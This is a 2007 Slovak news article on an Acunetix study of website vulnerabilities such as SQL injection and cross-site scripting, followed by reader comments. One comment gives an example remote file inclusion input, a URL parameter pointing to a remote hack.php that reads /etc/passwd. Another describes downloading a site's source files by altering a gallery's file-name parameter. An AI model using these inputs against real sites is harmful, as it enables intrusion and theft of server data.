70% web stránok je údajne hacknuteľných

DSL.sk, 14.2.2007

Až 70% web stránok obsahuje stredne závažné alebo závažné bezpečnostné chyby, ktoré môžu využiť hackeri na neautorizované získanie dát z webového servera.

Tvrdí to najnovšia štúdia spoločnosti Acunetix.

Acunetix v roku 2006 skenovala na zraniteľnosti 3 200 webových stránok, u 70% identifikovala stredne závažné alebo závažné bezpečnostné chyby.

Pri zarátaní menej závažných chýb ako napríklad neautorizované získanie obsahu adresára obsahovalo bezpečnostné chyby až 91% web stránok.

Celkovo bolo identifikovaných 210 tisíc chýb na 3 200 testovaných web stránkach, čo dáva priemer 66 chýb na stránku.

U najzávažnejších chýb bola najčastejšou SQL injection, na tento typ trpí 50% stránok spomedzi web stránok s nejakou závažnou bezpečnostnou chybou.

Druhou najčastejšou chybou je Cross Site Scripting, ktorá sa nachádza na 42% web stránkach, štatisticky významnou je aj možnosť získania zdrojového kódu aktívnych stránok v 7% prípadov.

Správu spoločnosti je možné nájsť tu.




Najnovšie články:



Diskusia:

rch Od: rch | Pridané: 14.2.2007 9:57 Tak proti SQL injection sa dá pomerne jednoducho chrániť, ak sa kontrolujú reťazce, ktoré púšťame k SQL serveru, nie? Foldre - no na tie netreba zabudnúť. A ASP.NET pozná tzv. ViewState, ktoré šifrovaním stavu obsahu a unikátnymi identifikátormi vie rozpoznať postback, v ktorom niečo nie je v poriadku... Odpovedať Hodnotiť:

quix Od: quix | Pridané: 14.2.2007 10:31 sql injecton je naozaj krasna vec, ale to mas tak.. cim viac rychlokvasenych pisalkov v akomkolvek jazyku tym hlupejsie chyby. :D staci kupit knihu typu "rychlo a lahko na vlastny e-shop" a dovidenia Odpovedať Hodnotiť:

debian Od: debian | Pridané: 14.2.2007 11:24 hackthissite.org :) Odpovedať Hodnotiť:

thriler Od: thriler | Pridané: 14.2.2007 15:07 No ked len 70% tych 91% znie uz lepsie, ale aj tak dost male cislo. Ale vlastne ked si zoberieme ze na niektorych servroch bezi akurat hovno a je otvoreny akurat tak port 80, tak tych 10% sa tam da nasustat. Odpovedať Hodnotiť:

qaws Od: qaws | Pridané: 14.2.2007 16:09 To sa pocita aj chyba servera, alebo iba zranitelnost (chyba), ktoru ja spravim pri pisani kodu? Odpovedať Hodnotiť:

Uhlik Od: Uhlik | Pridané: 14.2.2007 16:26 len chyba kodu stranky ... uz som zazil aj take, ze sa includoval skript z $_GET premennej, takze stacilo zamenit ?id=download.php trebars ?id=http://moj_webka/hack.php, kde bolo "echo('/etc/passwd')" a zoznam uzivatelov bol na svete :D ... a kym dotycnemu taky zoznam neukazes, tak ti bude omielat stale dookola, ze jeho kod nie je vobec deravy ;) ... Odpovedať Hodnotiť:

Uhlik Od: Uhlik | Pridané: 14.2.2007 16:28 este aby som tu nebol zbuzerovany za to echo, tak to je prosim pekne len ako ilustracny kod ... nechcel som tu cmarat navody pre script kiddies ... Odpovedať Hodnotiť:

Bozz Od: Bozz | Pridané: 14.2.2007 21:05 co to tu placas... na co sa hrajes.. myslis ze ked vies trochu pisat stranky.. takze druhy to tiez vedia.. ked pises tak to aj preloz pre laikov ako som ja poprosim Odpovedať Hodnotiť:

uhm Od: uhm | Pridané: 15.2.2007 10:01 Umri. Odpovedať Hodnotiť:

localhost Od: localhost | Pridané: 14.2.2007 21:48 podobnu chybu som aj ja celkom nahodou objavil na SK/CZ strankach jednej nemenovanej svetovej automobilky.Uplne banalna chyba sposobila, ze som velmi jednoduchym sposobom mohol postahovat zdrojove subory.Tak som aj postahoval co sa dalo, ale kedze nie som svina, nijako som to nezneuzil a radsej som im napisal nech si to daju pekne do poriadku. Odpovedať Hodnotiť:

Bozz Od: Bozz | Pridané: 14.2.2007 23:19 ako? Odpovedať Hodnotiť:

localhost Od: localhost | Pridané: 15.2.2007 9:15 ...ako som napisal, cez podobnu chybu o ktorej pisal aj uhlik. Konkretne tam mali galeriu v ktorej sa nazov obrazku ktory sa ma zobrazit prenasal v URL (GET parameter), ja som namiesto nazvu obrazku zadal nazvy suborov ktore som chcel :) Odpovedať Hodnotiť:

Pridať komentár